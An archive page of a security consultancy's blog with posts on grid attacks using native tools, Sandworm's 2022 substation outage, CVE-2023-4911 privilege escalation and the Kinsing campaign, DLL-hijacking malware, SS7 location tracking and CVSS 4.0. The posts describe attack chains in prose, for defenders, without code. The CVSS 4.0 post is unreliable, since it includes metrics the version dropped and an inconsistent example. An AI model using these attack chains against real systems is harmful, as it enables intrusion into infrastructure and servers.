Nov 13 2023

HOW LIVING-OFF-THE-LAND (LOTL) TECHNIQUE IS USED TO HACK INTO POWER GRIDS & CAUSE POWER OUTAGES

Category: Grid Vulnerabilitiesdisc7 @ 9:11 am
How Living-off-the-land (LotL) technique is used to hack into power grids & cause power outages

Living-off-the-land (LotL) techniques in cyber attacks refer to the use of legitimate, native tools already present in the target system to carry out malicious activities. This approach is particularly stealthy because it leverages tools and processes that are typically trusted and thus less likely to raise alarms. In the context of Operational Technology (OT) or Industrial Control Systems (ICS), such attacks can be especially dangerous due to the critical nature of the systems involved. Here’s how such an attack might work, with examples:

1. INITIAL ACCESS

  • Example: A phishing email is sent to an employee in the OT/ICS environment. The email contains a seemingly harmless document that, when opened, executes a PowerShell script (a native Windows tool) to create a backdoor.

2. LATERAL MOVEMENT

  • Example: Once inside the network, attackers might use legitimate system administration tools like Windows Management Instrumentation (WMI) or Remote Desktop Protocol (RDP) to move laterally across the network, searching for critical OT/ICS components.

3. ELEVATION OF PRIVILEGES

  • Example: Attackers might use built-in tools like Netstat to identify security software or firewall settings and then use other native scripts or commands to disable these defenses, or to elevate their access privileges within the system.

4. DISCOVERY AND INFORMATION GATHERING

  • Example: Tools like Tasklist or Systeminfo (native to Windows) are used to gather information about the system, such as running processes, installed software, or network configurations relevant to the OT/ICS environment.

5. EXPLOITATION AND MANIPULATION

  • Example: In an ICS environment, attackers might use standard industrial communication protocols like Modbus or DNP3 (which are legitimate and essential for normal operations) to send malicious commands to control systems, potentially disrupting physical processes like power generation or water treatment.

6. PERSISTENCE AND EXFILTRATION

  • Example: Attackers could use standard data transfer tools like FTP or even Windows BITS (Background Intelligent Transfer Service) to exfiltrate stolen data, or to maintain persistence by regularly updating malware or downloading additional tools.

7. CLEANUP

  • Example: To erase their tracks, attackers might use native cleanup tools or scripts to delete logs or any evidence of their activities, making detection and forensics much more difficult.

In late 2022, a significant cyber-physical incident occurred in Ukraine, attributed to the Russia-linked threat actor Sandworm. This event targeted Ukrainian critical infrastructure and utilized a multi-event cyber attack strategy, incorporating innovative techniques to impact industrial control systems (ICS) and operational technology (OT). The Sandworm actor employed OT-level living-off-the-land (LotL) techniques, likely causing a substation’s circuit breakers to trip and resulting in an unplanned power outage. This outage coincided with mass missile strikes across Ukraine’s critical infrastructure. Additionally, Sandworm executed a second disruptive event by deploying a new variant of CADDYWIPER malware in the victim’s IT environment.

KingPhisher – Phishing Campaign Toolkit [Step by Step Tutorial]

This attack exemplifies the latest advancements in Russia’s cyber-physical attack capabilities, particularly visible since Russia’s invasion of Ukraine. The techniques used indicate a maturing offensive OT arsenal, capable of identifying novel OT threat vectors, developing new capabilities, and leveraging various types of OT infrastructure for attacks. Utilizing LotL techniques likely reduced the time and resources required for the cyber-physical attack. Although the initial intrusion point remains undetermined, the rapid development of the OT component of this attack suggests the actor’s ability to swiftly create similar capabilities against other OT systems globally.

Sandworm, active since at least 2009, is a versatile threat actor conducting espionage, influence, and attack operations, primarily supporting Russia’s Main Intelligence Directorate (GRU). The group’s primary focus has been Ukraine, where it has orchestrated disruptive and destructive attacks using wiper malware, especially during Russia’s re-invasion in 2022. However, Sandworm’s activities extend globally, underlining the Russian military’s extensive ambitions and interests in various regions. The group’s global threat activity and novel OT capabilities necessitate proactive measures from OT asset owners to mitigate potential risks.

As per mandiant research, the 2022 intrusion began or prior to June 2022, culminating in two disruptive events on October 10 and 12. Sandworm accessed the OT environment via a hypervisor hosting a SCADA management instance for a substation, potentially having SCADA system access for up to three months. On October 10, Sandworm used an optical disc (ISO) image, “a.iso,” to execute a native MicroSCADA binary, likely for malicious control commands to switch off substations. The attackers, got into the operational technology (OT) system through a key piece of software (a hypervisor) that managed the control system (SCADA) of a power substation. This means they had access to the system that controls how the power substation works. For up to three months, they could have been inside this system without being detected. On October 10, they used a special file (an ISO image named “a.iso”) to run a command in the control system that was likely intended to turn off power substations.

This case underscores the evolving nature of cyber threats, particularly in critical infrastructure sectors. The increasing sophistication and rapid development of such attacks highlight the need for enhanced cybersecurity measures, continuous monitoring, and preparedness against novel and complex cyber threats in OT and ICS environments.

In OT/ICS environments, such LotL attacks are particularly concerning because they:

  • Are harder to detect due to the use of legitimate tools.
  • Can cause significant physical and operational damage.
  • May bypass traditional security measures that don’t account for malicious use of native tools.

Defending against such attacks requires a combination of robust cybersecurity practices, including employee training, network segmentation, constant monitoring for anomalous behaviors, and regular updating and patching of all systems.

Business internet safety guide

Prepare Your Home for a Sudden Grid-Down Situation: Take Self-Reliance to the Next Level with Proven Methods and Strategies to Survive a Grid-Down … the Modern Family to Prepare for Any Crisis)

InfoSec tools | InfoSec services | InfoSec books | Follow our blog | DISC llc is listed on The vCISO Directory

Tags: Grid Vulnerabilities, Power grid vulnerabilities

Nov 10 2023


Russian Hackers Hijacked Power Station Circuit Breakers Using LotL Technique

Category: Hacking,Information Securitydisc7 @ 11:10 am
Russian Hackers Hijacked Power Station Circuit Breakers Using LotL Technique

In a recent and alarming development, the notorious Russia-linked threat actor Sandworm executed a sophisticated cyber-physical attack targeting a critical infrastructure organization in Ukraine. 

The incident, responded to by cybersecurity firm Mandiant, unfolded as a multi-event assault, showcasing a novel technique to impact Industrial control systems (ICS) and operational technology (OT).

Unraveling Russia’s Cyber-Physical Capabilities

The attack, spanning from June to October 2022, demonstrated a significant evolution in Russia’s cyber-physical attack capabilities, notably visible since the invasion of Ukraine. 

Sandworm, known for its allegiance to Russia’s Main Intelligence Directorate (GRU), has historically focused on disruptive and destructive campaigns, particularly in Ukraine.

The unique aspect of this attack involved Sandworm’s utilization of living-off-the-land (LotL) techniques at the OT level, initially causing an unplanned power outage in conjunction with missile strikes across Ukraine. 

The threat actor further demonstrated its adaptability by deploying a new variant of the CADDYWIPER malware in the victim’s IT environment.

Mandiant’s analysis revealed the complexity of the attack, highlighting Sandworm’s ability to recognize novel OT threat vectors, develop new capabilities, and exploit various OT infrastructures. 

The threat actor’s deployment of LotL techniques indicated a streamlined approach, reducing the time and resources required for the cyber-physical assault.

Concerns Over Sandworm’s Adaptive Capabilities

Despite being unable to pinpoint the initial intrusion point, Mandiant suggested that the OT component of the attack may have been developed in as little as two months. 

This raises concerns about Sandworm’s capability to rapidly adapt and deploy similar attacks against diverse OT systems worldwide.

Sandworm’s global threat activity, coupled with its novel OT capabilities, prompted a call to action for OT asset owners worldwide. 

Mandiant provided detailed guidance, including detection methods, hunting strategies, and recommendations for hardening systems against such threats.

The attack’s timing, coinciding with Russian kinetic operations, suggested a strategic synchronization, indicating that the threat actor may have been waiting for a specific moment to deploy its capabilities. 

As observed in this incident, the evolution of Sandworm’s tactics offers insights into Russia’s ongoing investment in OT-oriented offensive cyber capabilities.

In conclusion, this Sandworm attack serves as a stark reminder of the escalating cyber threats faced by critical infrastructure globally. 

The continuous evolution of cyber adversaries necessitates a proactive approach from governments, organizations, and asset owners to secure and safeguard vital systems against such sophisticated attacks.

Sandworm: A New Era of Cyberwar and the Hunt for the Kremlin’s Most Dangerous Hackers

InfoSec tools | InfoSec services | InfoSec books | Follow our blog | DISC llc is listed on The vCISO Directory

Tags: Power station, Sandworm

Nov 09 2023

NordVPN safe and private access to the internet

Category: VPNdisc7 @ 9:56 pm

Protect your online activity

If you are not using a reliable VPN, your private information can be easily accessed by third parties. Get NordVPN to protect yourself from prying eyes.

Next-generation encryption

Connect to a VPN server and be sure that NordVPN’s cutting-edge A-256 encryption keeps your online data safe, even on public Wi-Fi.

Malware protection

Enjoy a higher level of security with NordVPN’s Threat Protection feature. Scan downloads for malware, block trackers, and hide ads.

NordVPN Plus — 1-Year VPN & Cybersecurity Software for NordVPN and NordPass — Protect Your Internet Activities, Block Online Threats, and Safely Manage Passwords | PC/Mac/Mobile | Activation Code via Email

InfoSec tools | InfoSec services | InfoSec books | Follow our blog | DISC llc is listed on The vCISO Directory

Tags: NordVPN

Nov 09 2023

HACKERS’ NEW FAVORITE: CVE-2023-4911 TARGETING DEBIAN, UBUNTU AND FEDRORA SERVERS IN THE CLOUD

Category: Linux Securitydisc7 @ 7:51 am
Hackers’ new favorite: CVE-2023-4911 targeting Debian, Ubuntu and Fedrora servers in the Cloud

CVE-2023-4911 is a serious security vulnerability within the GNU C Library (glibc), specifically in the dynamic loader ld.so, associated with the processing of the GLIBC_TUNABLES environment variable. This vulnerability has been exploited in cloud attacks, particularly by a group using the Kinsing malware for cryptojacking operations.

The flaw is a buffer overflow that can be exploited by a local attacker using specially crafted GLIBC_TUNABLES environment variables when launching binaries with Set-UID (SUID) permissions, which could potentially allow the execution of code with elevated privileges. The Qualys Threat Research Unit has been credited with discovering this vulnerability.

This vulnerability has been given a severity score of 7.8, which classifies it as high severity. Exploitation of this flaw could enable an attacker to gain root permission on a Linux system that is running a vulnerable version of GLIBC, specifically version 2.34 or similar.

Hacking Debian 12, 13, Ubuntu 22.04, 23.04 & Fedora 37, 38 servers using a single vulnerability

The issue has been noted to impact major Linux distributions, and organizations that use Linux systems, especially in cloud environments, are advised to patch this vulnerability promptly to mitigate the risks associated with it.

Exploit

To exploit CVE-2023-4911, threat actors would typically follow a sequence of steps that hinge on local access to a vulnerable system. The exploitation process can generally be broken down into the following stages:

  1. Initial Access: First, the attacker needs local access to a system that runs a vulnerable version of the GNU C Library, specifically where ld.so is affected by the buffer overflow. This access could be obtained through various means, such as compromising a low-privileged user account.
  2. Crafting Malicious Input: The attacker crafts a malicious GLIBC_TUNABLES environment variable. This variable is meant to be used for tuning performance and behavior aspects of the GNU C Library, but when crafted maliciously, it can trigger a buffer overflow.
  3. Exploiting the Buffer Overflow: By triggering the buffer overflow, the attacker aims to overwrite certain areas of memory. This could be the stack, the heap, or other memory locations, depending on how the dynamic loader (ld.so) is handling the environment variable.
  4. Injecting Code or Redirecting Execution: The overwritten memory could include the injection of malicious code, or it might alter the execution flow of the process to jump to code that the attacker controls. Typically, this would be shellcode—a small piece of code that launches a shell or another control mechanism.
  5. Elevating Privileges: If the process being exploited has SUID permissions, it runs with the privileges of the owner of the file, often root. By exploiting such a process, the attacker can execute their code with elevated privileges, effectively gaining root access to the system.

Here’s a hypothetical example:

  • Alice is a system administrator for a cloud service provider that uses Linux servers.
  • Bob is a threat actor who has managed to gain access to a low-privileged account on one of the Linux servers due to a weak password.
  • The server runs a version of GLIBC that is vulnerable to CVE-2023-4911.
  • Bob writes a malicious GLIBC_TUNABLES variable and uses it in conjunction with a vulnerable application that has SUID set to run as root.
  • When the application runs, the malicious variable causes a buffer overflow in ld.so, which Bob exploits to redirect the application’s execution flow to his shellcode.
  • Bob’s shellcode is executed with root privileges, giving him full control over the server.
  • Now with root access, Bob could install persistent backdoors, exfiltrate data, or use the compromised server for further attacks.

It’s important to note that exploitation of CVE-2023-4911, like many vulnerabilities, requires specific conditions to be met and often sophisticated knowledge of software internals, memory layout, and exploitation techniques. The exact details of the exploit can vary based on the system’s configuration, the attacker’s goals, and the environment variables involved.

The Aqua Nautilus team documented an attack by the Kinsing malware that exploited CVE-2023-4911 to elevate permissions on a compromised machine. Here’s how they described the exploitation process:

  1. Initial Access: The attackers gained initial access by exploiting a PHPUnit vulnerability (CVE-2017-9841), allowing them to download and execute a Perl script to open a reverse shell on the compromised machin.
  2. Manual Testing: The Kinsing attackers manually tested shell commands on the compromised systems. These commands included gathering system information, starting an interactive shell session, and creating a directory in /tmp.
  3. Downloading Exploits: They downloaded a script named gnu-acme.py, which was an exploit for the Looney Tunables vulnerability (CVE-2023-4911), allowing for local privilege escalation by exploiting a buffer overflow in the handling of the GLIBC_TUNABLES environment variable by ld.so.
  4. Executing Additional Exploits: After this, they fetched and executed an obfuscated PHP exploit, which, upon de-obfuscation, turned out to be a JavaScript designed for further exploitative activities. This resulted in a web shell backdoor that allowed them to maintain unauthorized access to the server.

This attack demonstrates the attackers’ sophisticated capabilities in chaining vulnerabilities to penetrate cloud environments, gain unauthorized access, and elevate privileges within the system.

Kinsing aims to gather CSP credentials, potentially exposing sensitive data, like AWS instance identity, which poses risks in cloud environments.

Here below, we have mentioned all the types of credentials and data that could be exposed:-

  • Temporary Security Credentials
  • IAM Role Credentials
  • Instance Identity Tokens

Mitigation

To mitigate an attack exploiting CVE-2023-4911, you should take the following steps:

  1. Patch the Vulnerability: Update the GNU C Library (glibc) to the latest version that includes a fix for CVE-2023-4911.
  2. Limit Access: Restrict local access to essential personnel and services, minimizing the number of users who can potentially exploit the vulnerability.
  3. Monitor for Suspicious Activity: Implement monitoring tools to detect unusual activity, such as unexpected changes to environment variables or unauthorized processes trying to gain elevated privileges.
  4. Harden Your Environment: Follow best practices for system hardening, such as disabling unnecessary services, closing open ports, and using tools like SELinux or AppArmor for enhanced security.
  5. Regular Security Audits: Conduct regular security audits to identify and remediate misconfigurations or unnecessary privileges that could be exploited.
  6. Use Security Tools: Employ security solutions such as intrusion detection systems, firewalls, and anti-malware tools that can detect and prevent exploitation attempts.
  7. Educate Staff: Train staff to recognize phishing attempts and other forms of social engineering that could lead to local access being compromised.
  8. Incident Response Plan: Have an incident response plan in place that includes procedures for dealing with suspected breaches, including how to contain and eradicate threats.
  9. Backup Regularly: Maintain regular backups of critical data to ensure that you can restore systems to a secure state if necessary.

By following these steps, you can significantly reduce the risk of exploitation and mitigate potential damage from attacks like those involving CVE-2023-4911.

Mastering Linux Security and Hardening: A practical guide to protecting your Linux system from cyber attacks

InfoSec tools | InfoSec services | InfoSec books | Follow our blog | DISC llc is listed on The vCISO Directory

Tags: DEBIAN, Mastering Linux Security and Hardening, UBUNTU AND FEDRORA

Nov 06 2023

Cloud security guidance

Category: Cloud computingdisc7 @ 9:52 am

How to choose, configure and use cloud services securely.

If you want to store and process data in the cloud, or use cloud platforms to build and host your own services, this guidance will help you do so securely.

Cloud usage continues to grow steadily, both in volume and the type of services being built and hosted in it. In fact, cloud is usually the preferred option when organisations procure new IT services, as reflected in the UK government’s Cloud First Policy.

Against this background, it’s essential that new services are chosen and built in a way which reflects their security needs.

Who is this guidance for?

All organisations can use this guidance to navigate the sometimes confusing array of technologies which make up ‘the cloud’, and the management models which underpin their use.

More particularly:

Note:

Individuals looking for advice about how to use online services securely should refer to our Cyber Aware advice on staying secure online.

This collection contains

Introduction to cloud security

Defining some common terms, and providing background on the various sections of this guide.

Understanding cloud services

Cloud services can be seen from a number of perspectives. This section considers:

  • service models and deployment models
  • the ‘shared responsibility model’ used by many cloud providers to handle day-to-day management of security
  • two specific security techniques; separation and cryptography

Choosing a cloud provider

The cloud security principles and how to use them, along with our lightweight security framework and some vendor responses to the principles.

Using cloud services securely

Some actions that customers of cloud services will need to take. This includes advice for cloud platforms and software as a service (SaaS), and those looking to lift and shift into the cloud.

Next page

Introduction to cloud security

https://www.ncsc.gov.uk/collection/cloud

Practical Cloud Security: A Guide for Secure Design and Deployment 

InfoSec tools | InfoSec services | InfoSec books | Follow our blog | DISC llc is listed on The vCISO Directory

Tags: cloud security

Nov 03 2023

OWASP API Security Top 10 2023

Category: API securitydisc7 @ 10:34 am

OWASP API Security Top 10 2023

OWASP-API-top-10Download


If you want to learn more, you can check the link below

Understanding API Security and Implications

InfoSec tools | InfoSec services | InfoSec books | Follow our blog | DISC llc is listed on The vCISO Directory

Tags: API Security, OWASP Top 10

Nov 02 2023

CVSS 4.0 EXPLAINED: FROM COMPLEXITY TO CLARITY IN VULNERABILITY ASSESSMENT

Category: Security vulnerabilitiesdisc7 @ 4:07 pm
CVSS 4.0 Explained: From Complexity to Clarity in Vulnerability Assessment

The Common Vulnerability Scoring System (CVSS) has been updated to version 4.0, which has been formally announced by the Forum of Incident Response and Security Teams (FIRST). This update comes eight years after the debut of CVSS v3.0, the previous version of the system. At its 35th annual conference, which took place in June in Montreal, Canada, FIRST presented CVSS 4.0 to the attendees. The Common Vulnerability Scoring System, also known as CVSS, is a standardised framework for evaluating the severity of software vulnerabilities. It does this by assigning numerical scores or qualitative labels (such as low, medium, high, and critical) based on factors such as exploitability, impact on confidentiality, integrity, availability, and required privileges, with higher scores indicating more severe vulnerabilities.

The Common Vulnerability Scoring System, more often referred to as CVSS, is a methodology that provides a framework for evaluating and conveying the severity of software vulnerabilities. It offers a standardised way that organisations and security experts may use to analyse vulnerabilities based on the characteristics of the vulnerabilities, and then prioritise those vulnerabilities. The CVSS ratings provide assistance in making educated judgements on which vulnerabilities should be addressed first and how resources should be distributed for vulnerability management.

There have been several versions of CVSS, and each version has included enhancements and modifications that make it possible to more accurately evaluate the severity of vulnerabilities. The previous version, CVSS 3.1, has been upgraded to the current version, CVSS 4.0, which includes a number of significant updates and enhancements, including the following:

CVSS 4.0 has been designed with the goal of simplifying the scoring system and making it more accessible to users. It makes the scoring process more straightforward, which makes it simpler for security experts to grasp and put into practise.

Accurate Scoring: CVSS 4.0 includes enhancements in scoring to enable more accurate evaluations of vulnerabilities. These improvements were made possible by the introduction of new scoring methods. It improves the base, temporal, and environmental parameters such that a more accurate representation of the real effect of a vulnerability may be achieved.

Enhanced Metrics: It provides new metrics, such as Scope and Attack Vector, to offer more insights about the nature of the vulnerability and its effect on the system. Enhanced Metrics.

Formula: CVSS 4.0 comes with a revised formula that may be used to determine the total score on the CVSS scale. When paired with additional indicators, this formula provides a more accurate representation of the severity of vulnerabilities.

Contextual Information: When it comes to rating vulnerabilities, CVSS 4.0 strongly recommends making advantage of any available contextual information. This contributes to the provision of a vulnerability assessment that is more precise and relevant depending on certain deployment circumstances.

Increased Scoring Flexibility: The updated version offers an increased degree of scoring flexibility for vulnerabilities. Users are given the option to choose several temporal and environmental criteria, so that the data may more accurately represent their unique situations.

The Common Vulnerability Scoring System (CVSS) version 4.0 marks an advancement in vulnerability scoring and solves some of the restrictions that were present in prior versions. It seeks to offer a system for analysing and prioritising vulnerabilities that is both more accurate and easier to use, with the ultimate goal of assisting organisations in improving their security posture by concentrating on the most pressing problems. In order to improve their vulnerability management procedures, security professionals and organisations should get aware with CVSS 4.0 and consider implementing it.

Lets take  an example of how you would use CVSS 4.0 to determine the degree of severity of a software vulnerability. For the sake of this example, we will employ a made-up vulnerability:

Vulnerability Description: An application contains a buffer overflow vulnerability, which an attacker can exploit to execute arbitrary code on the affected system.

Here’s how you would use CVSS 4.0 to assess the severity of this vulnerability:

Base Metrics:

  • Attack Vector (AV): The vulnerability can be exploited via network (AV:N). The attacker does not need local access to the system.
  • Attack Complexity (AC): The attack requires no special conditions (AC:LOW). It’s relatively easy to exploit.
  • Privileges Required (PR): The attacker needs to gain elevated privileges (PR:HIGH). This makes it more challenging to exploit.
  • User Interaction (UI): No user interaction is required (UI:NONE).
  • Scope (S): The scope of the vulnerability is unchanged, and it doesn’t impact other components (S:UNCHANGED).

Temporal Metrics:

  • Exploit Code Maturity (E): There is proof of concept code available, but no known exploits in the wild (E:POC).
  • Remediation Level (RL): There is an official fix available (RL:OFFICIAL-FIX).
  • Report Confidence (RC): The vulnerability has been confirmed by multiple sources (RC:HIGH).

Environmental Metrics (Specific to the organization’s setup):

  • Modified Attack Vector (MAV): The organization’s security controls have made it harder for attackers to exploit this vulnerability (MAV:NETWORK).
  • Modified Attack Complexity (MAC): The organization’s security measures have increased the difficulty of exploitation (MAC:HIGH).
  • Modified Privileges Required (MPR): The organization’s security settings require lower privileges for successful exploitation (MPR:LOW).

Now, you can calculate the CVSS 4.0 score based on these metrics:

  1. Calculate the Base Score: In this case, it might be, for example, 7.8.
  2. Calculate the Temporal Score by considering the temporal metrics: Let’s say it’s 6.2.
  3. Calculate the Environmental Score, taking into account the environmental metrics and organization-specific factors: The final score might be 4.3.

The overall CVSS 4.0 score for this vulnerability would be the Environmental Score, which is 4.3 in this example. This score helps organizations understand the severity of the vulnerability in their specific context, considering the mitigations and configurations in place.

The Art of Interception :Active and Passive Surveillance in Mobile Signaling Networks

The higher the CVSS score, the more severe the vulnerability. Organizations can then prioritize addressing vulnerabilities with higher scores to improve their security posture. CVSS 4.0 offers more flexibility and a better representation of the vulnerability’s impact, taking into account various contextual factors.

Cybersecurity Critical Vulnerability CVSS Score Vector: Grid Ruled Notebook, Funny Gift, 120 Pages, 7×8, for Writing Down Security Engineering or Design Ideas

InfoSec tools | InfoSec services | InfoSec books | Follow our blog | DISC llc is listed on The vCISO Directory

Tags: CVSS 4.0

Nov 02 2023

Implementation Guide ISO/IEC 27001:2022

Category: ISO 27kdisc7 @ 9:00 am

Implementation Guide ISO/IEC 27001:2022 by ISACA Germany Chapter.

About This Guide
Practical guide for the implementation of an Information Security Management System (ISMS) according to ISO/IEC 27001:2022

About ISO/IEC 27001:2022
ISO/IEC 27001 promotes a holistic approach to information security: vetting people, policies and technology. An information security management system implemented according to this standard is a tool for risk management, cyber-resilience and operational excellence.

ISACA Germany Chapter
Homepage can be found here https://lnkd.in/gRu8kT75

ISO-27001-2022-implementation-guideDownload

ISO 27001 Controls Handbook: Implementing and auditing 93 controls to reduce information security risks

InfoSec tools | InfoSec services | InfoSec books | Follow our blog | DISC llc is listed on The vCISO Directory

Tags: Implementation Guide ISO/IEC 27001:2022

Nov 01 2023

Hackers Deliver Malicious DLL Files Chained With Legitimate EXE Files

Category: Hacking,Information Securitydisc7 @ 9:31 am

Hackers opt for DLL hijacking as a technique to exploit vulnerable applications because it allows them to load malicious code by tricking a legitimate application into loading a malicious DLL.

This can give them unauthorized access and control over a system or application, enabling various types of attacks like:- 

  • Privilege escalation
  • Data theft
  • System compromise

An active threat involves an Infostealer distributing a legitimate EXE file alongside a hidden malicious DLL in the same directory.

The legitimate EXE runs the malicious DLL, a technique known as DLL hijacking, commonly used for malware distribution.

Malicious DLL With Legitimate EXE Files

Malware posing as software cracks is growing at a rapid pace and is getting distributed by the threat actors using DLL hijacking.

Users searching for cracked software leads to malicious sites, and the downloads are encrypted RAR files with passwords.

Running EXE infects the system, and they often have valid signatures, so always be cautious with cracked software, reads the ASEC report.

Distribution of the malware via webpages (Source - ASEC)
Distribution of the malware via webpages (Source – ASEC)

Malicious DLLs tweak part of legitimate DLLs as they decrypt and run data from a nearby file. Hiding data this way avoids altering DLL appearance, reducing detection risk.

For malware to work, the following elements are required to be placed in the same folder:-

  • Data
  • EXE
  • Modified DLL

Unzipping the password-protected file with the code “2023” gives you the following files:-

Contents of compressed file (Source - ASEC)
Contents of compressed file (Source – ASEC)

The following two files are genuine VLC files with valid signatures:-

  • Setup.exe
  • libvlc.dll

The “libvlccore.dll” is altered and lacks a matching signature, due to which the extra directories like demux and lua serve to mask its malicious nature.

Running ‘Setup.exe’ activates ‘libvlccore.dll,’ triggering a modified function that reads and decrypts ‘ironwork.tiff’ in the same folder. This file holds code info. disguised as a PNG.

It loads “pla.dll” from SysWow64 and injects code into its memory differently than typical malware. This method uses NTDLL relocation, and for “cmd.exe,” it loads “pla.dll” and injects the malware into it. 

A data file is written to %TEMP%. cmd.exe inherits it and has its EntryPoint changed to “pla.dll” code. This code decrypts a file, generates LummaC2 malware, and runs “explorer.exe,” injecting and executing the binary.

Process tree of malware execution (Source - ASEC)

LummaC2 targets victims and installs malware from its C2 server, and it steals various sensitive data using JSON-formatted responses from C2. 

The malware infects via legitimate EXE files, looking like original DLLs, posing a low detection risk.

IOCs

IOCs (Source - ASEC)
IOCs (Source – ASEC)
Hackers Deliver Malicious DLL Files Chained With Legitimate EXE Files

InfoSec tools | InfoSec services | InfoSec books | Follow our blog | DISC llc is listed on The vCISO Directory

Tags: Malicious DLL

Oct 31 2023

THE ART OF INTERCEPTION :ACTIVE AND PASSIVE SURVEILLANCE IN MOBILE SIGNALING NETWORKS

Category: Cyber surveillance,Mobile Securitydisc7 @ 7:23 am
The Art of Interception :Active and Passive Surveillance in Mobile Signaling Networks

Mobile network data might be one of our most recent and thorough dossiers. Our mobile phones are linked to these networks and expose our demographics, social circles, purchasing habits, sleeping patterns, where we live and work, and travel history. Technical weaknesses in mobile communications networks threaten this aggregate data. Such vulnerabilities may reveal private information to numerous varied players and are closely tied to how mobile phones roam among cell providers for travel. These vulnerabilities are usually related to signalling signals carried across telecommunications networks, which expose phones to possible location disclosure.

Telecommunications networks use private, open signalling links. These connections enable local and international roaming, allowing mobile phones to smoothly switch networks. These signalling protocols also enable networks to obtain user information including if a number is active, whether services are accessible, to which national network they are registered, and where they are situated. These connections and signalling protocols are continually targeted and exploited by surveillance actors, exposing our phones to several location disclosure techniques.

Most illegal network-based location disclosure is achievable because mobile telecommunications networks interact. Foreign intelligence and security agencies, commercial intelligence businesses, and law enforcement routinely want location data. Law enforcement and intelligence agencies may get geolocation information secretly using tactics similar to those employed by criminals. We shall refer to all of these players as ‘surveillance actors’ throughout this paper since they are interested in mobile geolocation surveillance.

Despite worldwide 4G network adoption and fast developing 5G network footprint, many mobile devices and their owners use 3G networks. The GSMA, which offers mobile industry information, services, and rules, reports 55% 3G subscriber penetration in Eastern Europe, the Middle East, and Sub-Saharan Africa. The UK-based mobile market intelligence company Mobilesquared estimates that just 25% of mobile network operators globally had built a signalling firewall to prevent geolocation spying by the end of 2021. Telecom insiders know that the vulnerabilities in the 3G roaming SS7 signalling protocol have allowed commercial surveillance products to provide anonymity, multiple access points and attack vectors, a ubiquitous and globally accessible network with an unlimited list of targets, and virtually no financial or legal risks.

The research done by Citizen labs focuses on geolocation risks from mobile signalling network attacks. Active or passive surveillance may reveal a user’s position using mobile signalling networks. They may use numerous strategies to do this.

The two methods differ significantly. Active surveillance employs software to trigger a mobile network response with the target phone position, whereas passive surveillance uses a collecting device to retrieve phone locations directly from the network. An adversarial network employs software to send forged signalling messages to susceptible target mobile networks to query and retrieve the target phone’s geolocation during active assaults. Such attacks are conceivable on networks without properly implemented or configured security safeguards. Unless they can install or access passive collecting devices in global networks, an actor leasing a network can only utilise active surveillance tactics.

However, cell operators and others may be forced to conduct active and passive monitoring. In this case, the network operator may be legally required to allow monitoring or face a hostile insider accessing mobile networks unlawfully. A third party might get access to the operator or provider by compromising VPN access to targeted network systems, allowing them to gather active and passive user location information.

The report primarily discusses geolocation threats in mobile signaling networks. These threats involve surveillance actors using either active or passive methods to determine a user’s location.

Active Surveillance:

  • In active surveillance, actors use software to interact with mobile networks and get a response with the target phone’s location.
  • Vulnerable networks without proper security controls are susceptible to active attacks.
  • Actors can access networks through lease arrangements to carry out active surveillance.

Passive Surveillance:

  • In passive surveillance, a collection device is used to obtain phone locations directly from the network.
  • Surveillance actors might combine active and passive methods to access location information.

Active Attacks:

  • Actors use software to send crafted signaling messages to target mobile networks to obtain geolocation information.
  • They gain access to networks through commercial arrangements with mobile operators or other service providers connected to the global network.

Vulnerabilities in Home Location Register (HLR) Lookup:

  • Commercial HLR lookup services can be used to check the status of mobile phone numbers.
  • Surveillance actors can pay for these services to gather information about the target phone’s location, country, and network.
  • Actors with access to the SS7 network can perform HLR lookups without intermediary services.

Domestic Threats:

  • Domestic location disclosure threats are concerning when third parties are authorized by mobile operators to connect to their network.
  • Inadequate configuration of signaling firewalls can allow attacks originating from within the same network to go undetected.
  • In some cases, law enforcement or state institutions may exploit vulnerabilities in telecommunications networks.

Passive Attacks:

  • Passive location attacks involve collecting usage or location data using network-installed devices.
  • Signaling probes and monitoring tools capture network traffic for operational and surveillance purposes.
  • Surveillance actors can use these devices to track mobile phone locations, even without active calls or data sessions.

Packet Capture Examples of Location Monitoring:

  • Packet captures show examples of signaling messages used for location tracking.
  • Location information, such as GPS coordinates and cell information, can be exposed through these messages.
  • User data sessions can reveal information like IMSI, MSISDN, and IMEI, allowing for user tracking.

The report highlights the various methods and vulnerabilities that surveillance actors can exploit to obtain the geolocation of mobile users, both domestically and internationally.Based on history, present, and future mobile network security evaluations, geolocation monitoring should continue to alarm the public and policymakers. Exploitable vulnerabilities in 3G, 4G, and 5G network designs are predicted to persist without forced openness that exposes poor practises and accountability mechanisms that require operators to fix them. All three network types provide surveillance actors more possibilities. If nation states and organised crime entities can actively monitor mobile phone locations domestically or abroad, such vulnerabilities will continue to threaten at-risk groups, corporate staff, military, and government officials.

Is My Cell Phone Bugged?: Everything You Need to Know to Keep Your Mobile Conversations Private

InfoSec tools | InfoSec services | InfoSec books | Follow our blog | DISC llc is listed on The vCISO Directory

Tags: MOBILE SIGNALING NETWORKS

Oct 30 2023

Proactive Boards Lead to Flexible CISOs as Companies Prepare for What’s to Come

Category: CISO,vCISOdisc7 @ 1:25 pm

In the leadership and communications section, Proactive Boards Enable More Reliable Cyber Governance, CISO Best Practices for Managing Cyber Risk, The Evolution of Work: How Can Companies Prepare for What’s to Come?, and more!

Visit https://www.securityweekly.com/bsw for all the latest episodes!

Show Notes: https://securityweekly.com/bsw-326

Oct 30 2023

IT ARMY OF UKRAINE DISRUPTED INTERNET PROVIDERS IN TERRITORIES OCCUPIED BY RUSSIA

Category: Cyber Attackdisc7 @ 10:39 am
IT Army of Ukraine disrupted internet providers in territories occupied by Russia

IT Army of Ukraine hacktivists have temporarily disrupted internet services in some of the territories that have been occupied by Russia.

Ukrainian hacktivists belonging to the IT Army of Ukraine group have temporarily disabled internet services in some of the territories that have been occupied by the Russian army.

After the invasion of the Crimea and the eastern Ukraine, Ukrainian telecommunications infrastructure was disable by Russian soldiers.

The hacktivists carried out DDoS attacks against the three Russian internet providers “Miranda-media,” “Krimtelekom,” and “MirTelekom.” The IT Army is inviting supporters to joint its operations by installing their software.

“We continue targeting internet and telecom providers to disrupt enemy communications. Today, our intel orchestrated a “thousand proxies” strike, disabling “Miranda-media,” “Krimtelekom,” and “MirTelekom.” This affects not only Crimea but also occupied parts of Kherson, Zaporizhia, Donetsk, and Luhansk regions. Another blow by our cyber army disrupting enemy military communication at the frontlines.” reads the message published by the group IT Army of Ukraine on its Telegram channel.

The Miranda Media ISP announced on Friday that is was facing a massive DDoS attack.

